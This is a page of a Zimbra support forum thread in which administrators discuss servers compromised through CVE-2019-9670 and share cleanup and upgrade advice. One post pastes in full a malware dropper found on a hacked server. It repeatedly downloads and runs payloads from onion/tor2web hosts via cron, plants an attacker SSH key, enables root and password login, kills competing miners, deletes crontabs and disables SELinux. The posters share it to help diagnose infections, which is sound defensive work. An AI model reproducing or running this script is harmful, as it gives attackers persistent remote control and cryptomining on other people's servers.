Page 15 of 25
Re: CVE-2019-9670 being actively exploited
Posted: Wed May 29, 2019 3:13 pm
by Toru
Drake wrote:UPDATE 28.05.2019 The cryptominer zmswatch appeared again even after all the taken procedures and renewing ssh keys. It seems they also managed to unlock the zimbra`s user crontab and add a line to it again.
Drake, thank you for this post. Thanks also to many others who contributed their energy and knowledge.
I have a few nasty lines in the cron file zimbra`s user.
This article perfectly describes how to change the cron for zimbra user.
https://wiki.zimbra.com/wiki/Step_to_re ... imbra_user
However, i do not have command "zmschedulebackup" in my ZCS 8.7.11
Code: Select all
[root@mail cron]# su - zimbra -c "zmschedulebackup -D"
-bash: zmschedulebackup: command not found
Does it work on your system? There are other ways to change cron file zimbra user?
Re: CVE-2019-9670 being actively exploited
Posted: Wed May 29, 2019 3:48 pm
by anzigo
Addtionally...
Check for existence of
If it exists, it'll be a recently created binary file. Delete it.
However, there would likely be multiple instances already running. To find them, run (then kill all instances):
Code: Select all
top -p $(pgrep -d ',' zmlogswatch)
Looks like that /opt/zimbra/lib/zmlogswatch binary was actively adding itself back to crontab, so you should then cleanup, or regenerate your zimbra crontab.
Re: CVE-2019-9670 being actively exploited
Posted: Wed May 29, 2019 4:47 pm
by Mike2000
Hi all!
What about Zimbra 8.8.8 ga foss, is it vulnerable?
If it is, what do i have to do? Update to 8.8.12 GA Release or what?
Now it working fine.
On the second mail-server (version 8.7) 3 days was spent on recovery after this exploit =((
Re: CVE-2019-9670 being actively exploited
Posted: Wed May 29, 2019 7:22 pm
by zud0ku
Excellent reference, they worked perfectly, service up and running again. Thanks.
Re: CVE-2019-9670 being actively exploited
Posted: Wed May 29, 2019 8:22 pm
by Kleanthis
I followed Drakes instructions patched system , found all suspicious jsps and removed , changed all ldap passwords , updated ssh keys , change zimbra user pass and so on.
A few hours later the malicious code appearred and even though it cannot write to the crontab (locked it) i can see it is trying .
What am i missing here ?
I can see the zimbra processes running , but i cant trace from where its coming. BTW i have patched using latest patch11 and not 10 not sure if it matters since it includes all previous fixes.
Code: Select all
zimbra 31901 0.0 0.0 8424 652 ? S 23:26 0:00 sleep 30
Re: CVE-2019-9670 being actively exploited
Posted: Wed May 29, 2019 10:42 pm
by mterrasson
Hi everyone, thank you all for your advices and your findings.
FYI, After searching for suspicious files containing "base64" pattern in order to clean a compromised server(Ubuntu 16.04 / 8.7.11) I found the following file with an interesting content :
/opt/zimbra/log/.editorinfo
Code: Select all
/opt/zimbra/log/.editorinfo
#!/bin/sh
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
RHOST="https://an7kmd2wp4xo7hpr"
TOR1=".tor2web.su/"
TOR2=".tor2web.io/"
TOR3=".onion.sh/"
RPATH1='src/ldm'
#LPATH="${HOME-/tmp}/.cache/"
TIMEOUT="75"
CTIMEOUT="22"
COPTS=" -fsSLk --retry 2 --connect-timeout ${CTIMEOUT} --max-time ${TIMEOUT} "
WOPTS=" --quiet --tries=2 --wait=5 --no-check-certificate --connect-timeout=${CTIMEOUT} --timeout=${TIMEOUT} "
tbin=$(command -v passwd); bpath=$(dirname "${tbin}")
curl="curl"; if [ $(curl --version 2>/dev/null|grep "curl "|wc -l) -eq 0 ]; then curl="echo"; if [ "${bpath}" != "" ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q "CURLOPT_VERBOSE" && curl="$f" && break; done; fi; fi
wget="wget"; if [ $(wget --version 2>/dev/null|grep "wgetrc "|wc -l) -eq 0 ]; then wget="echo"; if [ "${bpath}" != "" ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q ".wgetrc'-style command" && wget="$f" && break; done; fi; fi
#CHKCURL='curl="curl "; wget="wget "; if [ "$(whoami)" = "root" ]; then if [ $(command -v curl|wc -l) -eq 0 ]; then curl=$(ls /usr/bin|grep -i url|head -n 1); fi; if [ -z ${curl} ]; then curl="echo "; fi; if [ $(command -v wget|wc -l) -eq 0 ]; then wget=$(ls /usr/bin|grep -i wget|head -n 1); fi; if [ -z ${wget} ]; then wget="echo "; fi; if [ $(cat /etc/hosts|grep -i ".onion."|wc -l) -ne 0 ]; then echo "127.0.0.1 localhost" > /etc/hosts >/dev/null 2>&1; fi; fi; '
CHKCURL='tbin=$(command -v passwd); bpath=$(dirname "${tbin}"); curl="curl"; if [ $(curl --version 2>/dev/null|grep "curl "|wc -l) -eq 0 ]; then curl="echo"; if [ "${bpath}" != "" ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q "CURLOPT_VERBOSE" && curl="$f" && break; done; fi; fi; wget="wget"; if [ $(wget --version 2>/dev/null|grep "wgetrc "|wc -l) -eq 0 ]; then wget="echo"; if [ "${bpath}" != "" ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q "to <bug-wget@gnu.org>" && wget="$f" && break; done; fi; fi; if [ $(cat /etc/hosts|grep -i ".onion."|wc -l) -ne 0 ]; then echo "127.0.0.1 localhost" > /etc/hosts >/dev/null 2>&1; fi; '
LBIN8="kthrotlds"
null=' >/dev/null 2>&1'
sudoer=1
sudo=''
if [ "$(whoami)" != "root" ]; then
sudo="sudo "
timeout 1 sudo echo 'kthreadd' 2>/dev/null && sudoer=1||{ sudo=''; sudoer=0; }
fi
if [ $(command -v nohup|wc -l) -ne 0 ] && [ "$1" != "-n" ]; then
${sudo} chmod +x "$0"
nohup ${sudo} "$0" -n >/dev/null 2>&1 &
echo 'Sent!'
exit $?
fi
rand=$(head /dev/urandom | tr -dc A-Za-z0-9 | head -c $(shuf -i 4-16 -n 1) ; echo ''); if [ -z ${rand} ]; then rand='.tmp'; fi
echo "${rand}" > "$(pwd)/.${rand}" 2>/dev/null && LPATH="$(pwd)/.cache/"; rm -f "$(pwd)/.${rand}" >/dev/null 2>&1
echo "${rand}" > "/tmp/.${rand}" 2>/dev/null && LPATH="/tmp/.cache/"; rm -f "/tmp/.${rand}" >/dev/null 2>&1
echo "${rand}" > "/usr/local/bin/.${rand}" 2>/dev/null && LPATH="/usr/local/bin/.cache/"; rm -f "/usr/local/bin/.${rand}" >/dev/null 2>&1
echo "${rand}" > "${HOME}/.${rand}" 2>/dev/null && LPATH="${HOME}/.cache/"; rm -f "${HOME}/.${rand}" >/dev/null 2>&1
mkdir -p ${LPATH} >/dev/null 2>&1
${sudo} chattr -i ${LPATH} >/dev/null 2>&1; chmod 755 ${LPATH} >/dev/null 2>&1; ${sudo} chattr +a ${LPATH} >/dev/null 2>&1
C1="*/9 * * * * ${CHKCURL} ("'${curl}'" ${COPTS} ${RHOST}${TOR1}${RPATH1} -o ${LPATH}.ntp||"'${curl}'" ${COPTS} ${RHOST}${TOR2}${RPATH1} -o ${LPATH}.ntp||"'${curl}'" ${COPTS} ${RHOST}${TOR3}${RPATH1} -o ${LPATH}.ntp||"'${wget}'" ${WOPTS} ${RHOST}${TOR1}${RPATH1} -O ${LPATH}.ntp||"'${wget}'" ${WOPTS} ${RHOST}${TOR2}${RPATH1} -O ${LPATH}.ntp||"'${wget}'" ${WOPTS} ${RHOST}${TOR3}${RPATH1} -O ${LPATH}.ntp) && chmod +x ${LPATH}.ntp && $(command -v sh) ${LPATH}.ntp"
C2="*/11 * * * * root ${CHKCURL} ("'${curl}'" ${COPTS} ${RHOST}${TOR1}${RPATH1} -o ${LPATH}.ntp||"'${curl}'" ${COPTS} ${RHOST}${TOR2}${RPATH1} -o ${LPATH}.ntp||"'${curl}'" ${COPTS} ${RHOST}${TOR3}${RPATH1} -o ${LPATH}.ntp||"'${wget}'" ${WOPTS} ${RHOST}${TOR1}${RPATH1} -O ${LPATH}.ntp||"'${wget}'" ${WOPTS} ${RHOST}${TOR2}${RPATH1} -O ${LPATH}.ntp||"'${wget}'" ${WOPTS} ${RHOST}${TOR3}${RPATH1} -O ${LPATH}.ntp) && chmod +x ${LPATH}.ntp && $(command -v sh) ${LPATH}.ntp"
skey="ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC1Sdr0tIIL8yPhKTLzVMnRKj1zzGqtR4tKpM2bfBEx+AHyvBL8jDZDJ6fuVwEB+aZ8bl/pA5qhFWRRWhONLnLN9RWFx/880msXITwOXjCT3Qa6VpAFPPMazJpbppIg+LTkbOEjdDHvdZ8RhEt7tTXc2DoTDcs73EeepZbJmDFP8TCY7hwgLi0XcG8YHkDFoKFUhvSHPkzAsQd9hyOWaI1taLX2VZHAk8rOaYqaRG3URWH3hZvk8Hcgggm2q/IQQa9VLlX4cSM4SifM/ZNbLYAJhH1x3ZgscliZVmjB55wZWRL5oOZztOKJT2oczUuhDHM1qoUJjnxopqtZ5DrA76WH user@localhost"
if [ "$(whoami)" != "root" ]; then sshdir="${HOME}/.ssh"; else sshdir='/root/.ssh'; fi
${sudo} rm -f /tmp/* >/dev/null 2>&1
${sudo} rm -f /tmp/.* >/dev/null 2>&1
${sudo} ps ax|grep -v grep|grep -v defunct|grep -v "${LBIN8}"|grep -v ".ntp"|grep -i "nicehash\|linuxs\|linuxl\|Linux\|crawler.weibo\|44444\|cryptonight\|stratum\|gpg-daemon\|jobs.flu.cc\|nmap\|cranberry\|start.sh\|watch.sh\|krun.sh\|killTop.sh\|cpuminer\|/60009\|ssh_deny.sh\|clean.sh\|\./over\|mrx1\|redisscan\|ebscan\|redis-cli\|barad_agent\|\.sr0\|clay\|udevs\|\.sshd\|/tmp/init"|uniq| while read pid _; do if [ ${pid} -gt 301 ] && [ "$pid" != "$$" ]; then ${sudo} kill -9 "${pid}" >/dev/null 2>&1; ${sudo} kill -TERM -"${pid}" >/dev/null 2>&1; fi; done
${sudo} ps ax|grep -v grep|grep -v defunct|grep -v "bash"|grep -v "ssh"|grep -v ".ntp"|grep -i " sh\|kworkerds\|56416\|xmr\|xig\|ddgs\|minerd\|hashvault\|geqn\|.kthreadd\|httpdz\|kworker\|config.json\|gwjyhs.com\|pastebin.com\|sobot.com\|kerbero"|uniq| while read pid _; do if [ ${pid} -gt 301 ] && [ "$pid" != "$$" ]; then ${sudo} kill -9 "${pid}" >/dev/null 2>&1; ${sudo} kill -TERM -"${pid}" >/dev/null 2>&1; fi; done
hload=$(${sudo} ps aux|grep -v grep|grep -v defunct|grep -v "${LBIN8}"|grep -vi 'java '|grep -vi 'jenkins'|awk '{if($3>=54.0) print $11}'|head -n 1)
[ "${hload}" != "" ] && { ${sudo} ps ax|grep -v grep|grep -v defunct|grep -v "${LBIN8}"|grep "xmr\|${hload}"|while read pid _; do if [ ${pid} -gt 301 ] && [ "$pid" != "$$" ]; then ${sudo} kill -9 "${pid}" >/dev/null 2>&1; fi; done; }
#${sudo} pkill sleep >/dev/null 2>&1
#loop=$(ps -eo ppid,comm|grep -v grep|grep -i ' sleep'|awk '{print $1}'|uniq)
#if [ "${loop}" != "" ]; then for p in ${loop}; do if [ $p -gt 301 ] && [ $p -ne $$ ] && [ $p -ne $PPID ]; then $sudo kill -9 $p; $sudo pkill -P $p; fi; done; fi
hload2=$(${sudo} ps aux|grep -v grep|grep -v defunct|grep -v python|grep -v "${LBIN8}"|awk '{if($3>=0.0) print $2}'|uniq)
if [ "${hload2}" != "" ]; then
for p in ${hload2}; do
xm=''
if [ $p -gt 301 ]; then
if [ -f /proc/${p}/exe ]; then
xmf="$(readlink /proc/${p}/cwd 2>/dev/null)/$(cat /proc/${p}/comm 2>/dev/null)"
xm=$(grep -i "xmr\|cryptonight\|hashrate" /proc/${p}/exe 2>/dev/null)
elif [ -f /proc/${p}/comm ]; then
xmf="$(readlink /proc/${p}/cwd 2>/dev/null)/$(cat /proc/${p}/comm 2>/dev/null)"
xm=$(grep -i "xmr\|cryptonight\|hashrate" ${xmf} 2>/dev/null)
fi
if [ -n "${xm}" ]; then ${sudo} kill -9 ${p} >/dev/null 2>&1; ${sudo} chattr -i -a "${xmf}" >/dev/null 2>&1; ${sudo} rm -rf "${xmf}" >/dev/null 2>&1; fi
fi
done
fi
others=$(${sudo} ps aux|grep -v grep|grep -v defunct|grep -v "${LBIN8}"|awk '{if($3>=0.0) print $11}')
if [ "${others}" != "" ]; then
for o in ${others}; do
okill=0
if [ -f "${o}" ]; then
if grep -qi 'ddgs' "${o}" 2>/dev/null && grep -qi 'slave' "${o}" 2>/dev/null; then okill=1; fi
if grep -qi 'kerberods' "${o}" 2>/dev/null || grep -qi 'khugepageds' "${o}" 2>/dev/null; then okill=1; fi
if [ ${okill} -eq 1 ]; then
${sudo} ps ax|grep -v grep|grep -v defunct|grep "${o}"|while read pid _; do ${sudo} kill -9 "$pid" >/dev/null 2>&1; done
${sudo} chattr -i -a "${o}" >/dev/null 2>&1; rm -rf "${o}" >/dev/null 2>&1
fi
fi
done
fi
net=$(${curl} -fsSLk --max-time 6 ipinfo.io/ip)
if echo "${net}"|grep -q 'Could not resolve proxy'; then
unset http_proxy; unset HTTP_PROXY; unset https_proxy; unset HTTPS_PROXY
http_proxy=""; HTTP_PROXY=""; https_proxy=""; HTTPS_PROXY=""
fi
if [ ${sudoer} -eq 1 ]; then
if [ -f /etc/ld.so.preload ]; then
if [ $(which chattr|wc -l) -ne 0 ]; then ${sudo} chattr -i /etc/ld.so.preload >/dev/null 2>&1; fi
${sudo} ln -sf /etc/ld.so.preload /tmp/.ld.so >/dev/null 2>&1
>/tmp/.ld.so >/dev/null 2>&1
${sudo} rm -rf /etc/ld.so.preload* >/dev/null 2>&1
fi
#${sudo} find / -name ld.so.preload* -exec ${sudo} rm -rf {} \;
if [ -d /etc/systemd/system/ ]; then ${sudo} rm -rf /etc/systemd/system/cloud* >/dev/null 2>&1; fi
[ $(${sudo} cat /etc/hosts|grep -i ".onion."|wc -l) -ne 0 ] && { ${sudo} chattr -i -a /etc/hosts >/dev/null 2>&1; ${sudo} chmod 644 /etc/hosts >/dev/null 2>&1; ${sudo} sed -i '/.onion.$/d' /etc/hosts >/dev/null 2>&1; }
[ $(${sudo} cat /etc/hosts|grep -i "busybox"|wc -l) -ne 0 ] && { ${sudo} chattr -i -a /etc/hosts >/dev/null 2>&1; ${sudo} chmod 644 /etc/hosts >/dev/null 2>&1; ${sudo} sed -i '/busybox$/d' /etc/hosts >/dev/null 2>&1; }
[ $(${sudo} cat /etc/hosts|grep -i ".onion."|wc -l) -ne 0 ] && { ${sudo} echo '127.0.0.1 localhost' > /etc/hosts >/dev/null 2>&1; }
if [ -f /usr/bin/yum ]; then
if [ -f /usr/bin/systemctl ]; then
crstart="systemctl restart crond.service >/dev/null 2>&1"
crstop="systemctl stop crond.service >/dev/null 2>&1"
else
crstart="/etc/init.d/crond restart >/dev/null 2>&1"
crstop="/etc/init.d/crond stop >/dev/null 2>&1"
fi
elif [ -f /usr/bin/apt-get ]; then
crstart="service cron restart >/dev/null 2>&1"
crstop="service cron stop >/dev/null 2>&1"
elif [ -f /usr/bin/pacman ]; then
crstart="/etc/rc.d/cronie restart >/dev/null 2>&1"
crstop="/etc/rc.d/cronie stop >/dev/null 2>&1"
elif [ -f /sbin/apk ]; then
crstart="/etc/init.d/crond restart >/dev/null 2>&1"
crstop="/etc/init.d/crond stop >/dev/null 2>&1"
fi
if [ ! -f "${LPATH}.sysud" ] || [ $(bash --version 2>/dev/null|wc -l) -eq 0 ] || [ $(wget --version 2>/dev/null|wc -l) -eq 0 ]; then
if [ -f /usr/bin/yum ]; then
yum install -y -q -e 0 openssh-server iptables bash curl wget zip unzip python2 net-tools e2fsprogs vixie-cron cronie >/dev/null 2>&1
yum reinstall -y -q -e 0 curl wget unzip bash net-tools vixie-cron cronie >/dev/null 2>&1
chkconfig sshd on >/dev/null 2>&1
chkconfig crond on >/dev/null 2>&1;
if [ -f /usr/bin/systemctl ]; then
systemctl start sshd.service >/dev/null 2>&1
else
/etc/init.d/sshd start >/dev/null 2>&1
fi
elif [ -f /usr/bin/apt-get ]; then
rs=$(yes | ${sudo} apt-get update >/dev/null 2>&1)
if echo "${rs}"|grep -q 'dpkg was interrupted'; then y | ${sudo} dpkg --configure -a; fi
DEBIAN_FRONTEND=noninteractive ${sudo} apt-get --yes --force-yes install openssh-server iptables bash cron curl wget zip unzip python python-minimal vim e2fsprogs net-tools >/dev/null 2>&1
DEBIAN_FRONTEND=noninteractive ${sudo} apt-get --yes --force-yes install --reinstall curl wget unzip bash net-tools cron
${sudo} systemctl enable ssh
${sudo} systemctl enable cron
${sudo} /etc/init.d/ssh restart >/dev/null 2>&1
elif [ -f /usr/bin/pacman ]; then
pacman -Syy >/dev/null 2>&1
pacman -S --noconfirm base-devel openssh iptables bash cronie curl wget zip unzip python2 vim e2fsprogs net-tools >/dev/null 2>&1
systemctl enable --now cronie.service >/dev/null 2>&1
systemctl enable --now sshd.service >/dev/null 2>&1
/etc/rc.d/sshd restart >/dev/null 2>&1
elif [ -f /sbin/apk ]; then
#apk --no-cache -f upgrade >/dev/null 2>&1
apk --no-cache -f add curl wget unzip bash busybox openssh iptables python vim e2fsprogs e2fsprogs-extra net-tools openrc >/dev/null 2>&1
apk del openssl-dev net-tools >/dev/null 2>&1; apk del libuv-dev >/dev/null 2>&1;
apk add --no-cache openssl-dev libuv-dev net-tools --repository http://dl-cdn.alpinelinux.org/alpine/v3.9/main >/dev/null 2>&1
rc-update add sshd >/dev/null 2>&1
/etc/init.d/sshd start >/dev/null 2>&1
if [ -f /etc/init.d/crond ]; then rc-update add crond >/dev/null 2>&1; /etc/init.d/crond restart >/dev/null 2>&1; else /usr/sbin/crond -c /etc/crontabs >/dev/null 2>&1; fi
fi
fi
${sudo} chattr -i -a /var/spool/cron >/dev/null 2>&1; ${sudo} chattr -i -a -R /var/spool/cron/ >/dev/null 2>&1; ${sudo} chattr -i -a /etc/cron.d >/dev/null 2>&1; ${sudo} chattr -i -a -R /etc/cron.d/ >/dev/null 2>&1; ${sudo} chattr -i -a /var/spool/cron/crontabs >/dev/null 2>&1; ${sudo} chattr -i -a -R /var/spool/cron/crontabs/ >/dev/null 2>&1
${sudo} rm -rf /var/spool/cron/crontabs/* >/dev/null 2>&1; ${sudo} rm -rf /var/spool/cron/crontabs/.* >/dev/null 2>&1; ${sudo} rm -f /var/spool/cron/* >/dev/null 2>&1; ${sudo} rm -f /var/spool/cron/.* >/dev/null 2>&1; ${sudo} rm -rf /etc/cron.d/* >/dev/null 2>&1; ${sudo} rm -rf /etc/cron.d/.* >/dev/null 2>&1;
${sudo} chattr -i -a /etc/cron.hourly >/dev/null 2>&1; ${sudo} chattr -i -a -R /etc/cron.hourly/ >/dev/null 2>&1; ${sudo} chattr -i -a /etc/cron.daily >/dev/null 2>&1; ${sudo} chattr -i -a -R /etc/cron.daily/ >/dev/null 2>&1
${sudo} rm -rf /etc/cron.hourly/* >/dev/null 2>&1; ${sudo} rm -rf /etc/cron.hourly/.* >/dev/null 2>&1; ${sudo} rm -rf /etc/cron.daily/* >/dev/null 2>&1; ${sudo} rm -rf /etc/cron.daily/.* >/dev/null 2>&1;
${sudo} chattr -a -i /tmp >/dev/null 2>&1; ${sudo} rm -rf /tmp/* >/dev/null 2>&1; ${sudo} rm -rf /tmp/.* >/dev/null 2>&1
${sudo} chattr -a -i /etc/crontab >/dev/null 2>&1; ${sudo} chattr -i /var/spool/cron/root >/dev/null 2>&1; ${sudo} chattr -i /var/spool/cron/crontabs/root >/dev/null 2>&1
if [ -f /sbin/apk ]; then
${sudo} mkdir -p /etc/crontabs >/dev/null 2>&1; ${sudo} chattr -i -a /etc/crontabs >/dev/null 2>&1; ${sudo} chattr -i -a -R /etc/crontabs/* >/dev/null 2>&1
${sudo} rm -rf /etc/crontabs/* >/dev/null 2>&1; ${sudo} echo "${C1}" > /etc/crontabs/root >/dev/null 2>&1 && ${sudo} echo "${C2}" >> /etc/crontabs/root >/dev/null 2>&1 && ${sudo} echo '' >> /etc/crontabs/root >/dev/null 2>&1 && ${sudo} crontab /etc/crontabs/root
elif [ -f /usr/bin/apt-get ]; then
${sudo} mkdir -p /var/spool/cron/crontabs >/dev/null 2>&1; ${sudo} chattr -i -a /var/spool/cron/crontabs/root >/dev/null 2>&1
rs=$(${sudo} echo "${C1}" > /var/spool/cron/crontabs/root 2>&1)
if [ -z ${rs} ]; then ${sudo} echo '' >> /var/spool/cron/crontabs/root && ${sudo} crontab /var/spool/cron/crontabs/root; fi
else
${sudo} mkdir -p /var/spool/cron >/dev/null 2>&1; ${sudo} chattr -i -a /var/spool/cron/root >/dev/null 2>&1
rs=$(${sudo} echo "${C1}" > /var/spool/cron/root 2>&1)
if [ -z ${rs} ]; then ${sudo} echo '' >> /var/spool/cron/root && ${sudo} crontab /var/spool/cron/root; fi
fi
${sudo} chattr -i -a /etc/crontab >/dev/null 2>&1; rs=$(${sudo} echo "${C2}" > /etc/crontab 2>&1)
if [ -z "${rs}" ]; then ${sudo} echo '' >> /etc/crontab && ${sudo} crontab /etc/crontab; fi
${sudo} mkdir -p /etc/cron.d >/dev/null 2>&1; ${sudo} chattr -i -a /etc/cron.d/root >/dev/null 2>&1
rs=$(${sudo} echo "${C2}" > /etc/cron.d/root 2>&1 && ${sudo} echo '' >> /etc/cron.d/root 2>&1)
if [ $(crontab -l 2>/dev/null|grep -i "${RHOST}"|wc -l) -lt 1 ]; then
(${curl} ${COPTS} https://busybox.net/downloads/binaries/1.30.0-i686/busybox_RM -o ${LPATH}.rm||${wget} ${WOPTS} https://busybox.net/downloads/binaries/1.30.0-i686/busybox_RM -O ${LPATH}.rm) && chmod +x ${LPATH}.rm
(${curl} ${COPTS} https://busybox.net/downloads/binaries/1.30.0-i686/busybox_CROND -o ${LPATH}.cd||${wget} ${WOPTS} https://busybox.net/downloads/binaries/1.30.0-i686/busybox_CROND -O ${LPATH}.cd) && chmod +x ${LPATH}.cd
(${curl} ${COPTS} https://busybox.net/downloads/binaries/1.30.0-i686/busybox_CRONTAB -o ${LPATH}.ct||${wget} ${WOPTS} https://busybox.net/downloads/binaries/1.30.0-i686/busybox_CRONTAB -O ${LPATH}.ct) && chmod +x ${LPATH}.ct
if [ -f ${LPATH}.rm ] && [ -f ${LPATH}.ct ]; then
${sudo} "${crstop}"
cd=$(which crond)
ct=$(which crontab)
#if [ -n "${cd}" ]; then ${sudo} ${LPATH}.rm ${cd}; ${sudo} cp ${LPATH}.cd ${cd}; fi
if [ -n "${ct}" ]; then ${sudo} ${LPATH}.rm ${ct}; ${sudo} cp ${LPATH}.ct ${ct}; fi
${sudo} "${crstart}"
fi
fi
${sudo} mkdir -p "${sshdir}" >/dev/null 2>&1
if [ ! -f ${sshdir}/authorized_keys ]; then ${sudo} touch ${sshdir}/authorized_keys >/dev/null 2>&1; fi
${sudo} chattr -i -a ${LPATH} >/dev/null 2>&1; ${sudo} chattr -i -a "${sshdir}" >/dev/null 2>&1; ${sudo} chattr -i -a -R "${sshdir}/" >/dev/null 2>&1; ${sudo} chattr -i -a ${sshdir}/authorized_keys >/dev/null 2>&1
if [ -n "$(grep -F redis ${sshdir}/authorized_keys)" ] || [ $(wc -l < ${sshdir}/authorized_keys) -gt 98 ]; then ${sudo} echo "${skey}" > ${sshdir}/authorized_keys; fi
if test "$(${sudo} grep "^${skey}" ${sshdir}/authorized_keys)" != "${skey}"; then ${sudo} echo "${skey}" >> ${sshdir}/authorized_keys; fi
${sudo} chmod 0700 ${sshdir} >/dev/null 2>&1; ${sudo} chmod 600 ${sshdir}/authorized_keys >/dev/null 2>&1; ${sudo} chattr +i ${sshdir}/authorized_keys >/dev/null 2>&1; ${sudo} rm -rf ${sshdir}/authorized_keys* >/dev/null 2>&1
[ "$(${sudo} cat /etc/ssh/sshd_config | grep '^PermitRootLogin')" != "PermitRootLogin yes" ] && { ${sudo} echo PermitRootLogin yes >> /etc/ssh/sshd_config; }
[ "$(${sudo} cat /etc/ssh/sshd_config | grep '^RSAAuthentication')" != "RSAAuthentication yes" ] && { ${sudo} echo RSAAuthentication yes >> /etc/ssh/sshd_config; }
[ "$(${sudo} cat /etc/ssh/sshd_config | grep '^PubkeyAuthentication')" != "PubkeyAuthentication yes" ] && { ${sudo} echo PubkeyAuthentication yes >> /etc/ssh/sshd_config; }
[ "$(${sudo} cat /etc/ssh/sshd_config | grep '^UsePAM')" != "UsePAM yes" ] && { ${sudo} echo UsePAM yes >> /etc/ssh/sshd_config; }
[ "$(${sudo} cat /etc/ssh/sshd_config | grep '^PasswordAuthentication yes')" != "PasswordAuthentication yes" ] && { ${sudo} echo PasswordAuthentication yes >> /etc/ssh/sshd_config; }
touch "${LPATH}.sysud"
else
if [ $(which crontab|wc -l) -ne 0 ]; then
crontab -r >/dev/null 2>&1
(crontab -l >/dev/null 2>&1; echo "${C1}") | crontab -
fi
fi
rm -rf ./main* >/dev/null 2>&1
rm -rf ./*.ico* >/dev/null 2>&1
rm -rf ./r64* >/dev/null 2>&1
rm -rf ./r32* >/dev/null 2>&1
[ $(echo "$0"|grep -i ".cache"|wc -l) -eq 0 ] && [ "$1" != "" ] && { rm -f "$0" >/dev/null 2>&1; }
echo -e '\n'
(${curl} ${COPTS} ${RHOST}${TOR1}src/main||${curl} ${COPTS} ${RHOST}${TOR2}src/main||${curl} ${COPTS} ${RHOST}${TOR3}src/main||${wget} ${WOPTS} ${RHOST}${TOR1}src/main||${wget} ${WOPTS} ${RHOST}${TOR2}src/main||${wget} ${WOPTS} ${RHOST}${TOR3}src/main)|base64 -d |${sudo} $(command -v bash)
if [ ${sudoer} -eq 1 ]; then
if echo "$(${sudo} cat /etc/selinux/config 2>/dev/null|grep "SELINUX="|tail -n 1)"|grep -q 'enforcing'; then
${sudo} sed -i "s:SELINUX=enforcing:SELINUX=disabled:" /etc/selinux/config || { echo "SELinux could not be disabled. Exiting."; exit; }
${sudo} shutdown -r now >/dev/null 2>&1
${sudo} reboot -f >/dev/null 2>&1
fi
if echo "$(sestatus -v 2>/dev/null| head -n 1)"|grep -q 'enabled'; then ${sudo} shutdown -r now >/dev/null 2>&1; ${sudo} reboot -f >/dev/null 2>&1; fi
I removed the file, killed the processes and did the verifications advised in this thread (ssh_keys, password, compromised jsp files, etc).
I'm a bit to tired ans not sure to have the skills required to analyse the scripts atm but will do my best tomorow.
Best regards to you all,
Mathieu
Re: CVE-2019-9670 being actively exploited
Posted: Thu May 30, 2019 6:04 am
by maxxer
Mike2000 wrote:What about Zimbra 8.8.8 ga foss, is it vulnerable?
If it is, what do i have to do? Update to 8.8.12 GA Release or what?
Yes, you must update to the latest minor release of 8.8, that is 8.8.12P2
Re: CVE-2019-9670 being actively exploited
Posted: Thu May 30, 2019 6:29 am
by Mike2000
maxxer wrote:Mike2000 wrote:What about Zimbra 8.8.8 ga foss, is it vulnerable?
If it is, what do i have to do? Update to 8.8.12 GA Release or what?
Yes, you must update to the latest minor release of 8.8, that is 8.8.12P2
Sorry for stupid questions, but i a'm not understand how to do it properly.
If i have ubuntu 16.04 - at first i should update it to 18.04 ?
I made a backup virtual-machine with Zimbra.
Then i use "apt update", "apt upgrade" and "do-release-upgrade" and after reboot it broken zimbra..
Code: Select all
root@mail:/home/rn# su - zimbra -c "zmcontrol -v"
-su: zmcontrol: команда не найдена
Then i downloaded zcs-8.8.12_GA_3794.UBUNTU16_64.20190329045002.tgz
untar it and start install..
It looks like the installer had delete my configs and whant to start over..
At the configuration i see:
Code: Select all
Main menu
1) Common Configuration:
+Hostname: mail.mydomain.biz
+Ldap master host: mail.mydomain.biz
+Ldap port: 389
******* +Ldap Admin password: Not Verified
+Store ephemeral attributes outside Ldap: no
+Secure interprocess communications: yes
+TimeZone: Europe/Moscow
+IP Mode: ipv4
+Default SSL digest: sha256
2) zimbra-ldap: Enabled
+Create Domain: yes
+Domain to create: mail.mydomain.biz
+Ldap root password: set
+Ldap replication password: set
******* +Ldap postfix password: Not Verified
******* +Ldap amavis password: Not Verified
******* +Ldap nginx password: Not Verified
******* +Ldap Bes Searcher password: Not Verified
3) zimbra-logger: Enabled
4) zimbra-mta: Enabled
+Enable Spamassassin: yes
+Enable Clam AV: yes
+Enable OpenDKIM: yes
+Notification address for AV alerts: admin@mydomain.biz
******* +Bind password for postfix ldap user: Not Verified
******* +Bind password for amavis ldap user: Not Verified
5) zimbra-snmp: Enabled
6) zimbra-store: Enabled
7) zimbra-spell: Enabled
8) zimbra-proxy: Enabled
+Enable POP/IMAP Proxy: TRUE
+Enable strict server name enforcement? TRUE
+IMAP proxy port: 143
+IMAP SSL proxy port: 993
+POP proxy port: 110
+POP SSL proxy port: 995
******* +Bind password for nginx ldap user: Not Verified
+Enable HTTP[S] Proxy: TRUE
+HTTP proxy port: 80
+HTTPS proxy port: 443
+Proxy server mode: https
9) Default Class of Service Configuration:
******* +Enable Tasks Feature: UNSET
s) Save config to file
x) Expand menu
q) Quit
Address unconfigured (**) items or correct ldap configuration (? - help) 2
Ldap configuration
1) Status: Enabled
2) Create Domain: yes
3) Domain to create: mail.mydomain.biz
4) Ldap root password: set
5) Ldap replication password: set
** 6) Ldap postfix password: Not Verified
** 7) Ldap amavis password: Not Verified
** 8) Ldap nginx password: Not Verified
** 9) Ldap Bes Searcher password: Not Verified
Select, or 'r' for previous menu [r]
WTF? Help please
How to properly update Release 8.8.8.GA.2009.UBUNTU16.64 UBUNTU16_64 FOSS edition.?
Re: CVE-2019-9670 being actively exploited
Posted: Thu May 30, 2019 6:48 am
by maxxer
Mike2000 wrote:Sorry for stupid questions, but i a'm not understand how to do it properly.
If i have ubuntu 16.04 - at first i should update it to 18.04 ?
you don't have to. you can install 8.8.12 on 16.04.
anyway 18.04 is still in beta, don't use it
Re: CVE-2019-9670 being actively exploited
Posted: Thu May 30, 2019 7:45 am
by zgokan
Hello
I use Zimbra OS. Where can I download the related patches "CVE-2019-9670" ?
Code: Select all
Release 8.7.7_GA_1787.RHEL6_64_20170410133400 RHEL6_64 FOSS edition.
